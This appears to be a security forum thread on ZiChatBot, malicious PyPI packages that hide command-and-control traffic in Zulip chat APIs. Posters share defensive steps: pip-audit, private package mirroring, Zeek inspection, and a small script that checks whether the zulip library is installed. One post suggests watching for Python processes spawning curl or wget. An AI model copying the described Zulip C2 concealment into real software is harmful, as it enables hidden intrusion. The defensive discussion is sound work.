PyPI Supply Chain Alert: ZiChatBot & Zulip C2 Analysis
Just caught the latest report on ZiChatBot targeting PyPI users. It’s a classic supply chain attack vector but with a twist: three malicious packages delivering malware via wheel files on both Windows and Linux.
The TTPs are concerning because they leverage Zulip APIs for Command and Control (C2). Since Zulip is a legitimate group chat application often used by engineering teams, the malware traffic effectively hides in plain sight. Blocking it isn't as simple as blacklisting a domain if your org uses it.
The malware doesn't just download files; it sets up persistence and communicates via the API, making it harder to distinguish from legitimate user activity.
If you're auditing, check your package installation logs. You can use pip-audit to check for known vulnerabilities, but for this specific supply chain risk, you need to check package provenance.
pip-audit --desc
Also, monitor for Python processes spawning curl or wget to unexpected endpoints, or specific modules importing the zulip client library without business justification.
How is everyone handling the vetting of new PyPI packages in your CI/CD pipelines? Are you doing static analysis on the source code or just trusting the package popularity?
The Zulip abuse is a clever evolution of the Discord/Telegram bot trends we saw last year. It makes signature-based detection nearly impossible if you use that tool internally. We're currently deploying Zeek to inspect the JSON payloads on Zulip connections; the C2 traffic usually has different metadata structures than human chatter.
We stopped allowing direct pip install from the public index in our build pipelines a while back. We mirror packages to a private repo (Sonatype Nexus) and only promote packages after manual review. It slows down development slightly, but it completely blocks this type of typosquatting/malware injection.
Good catch on the Zulip API detail. For those looking for a quick IOC sweep, check your environment for unexpected imports of the zulip package in scripts that shouldn't be communicating externally.
import sys
import pkgutil
if pkgutil.find_loader('zulip') is not None:
print('Zulip library found in environment')
If you find it in a backend server that isn't supposed to be a chat bot, you might have an issue.
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access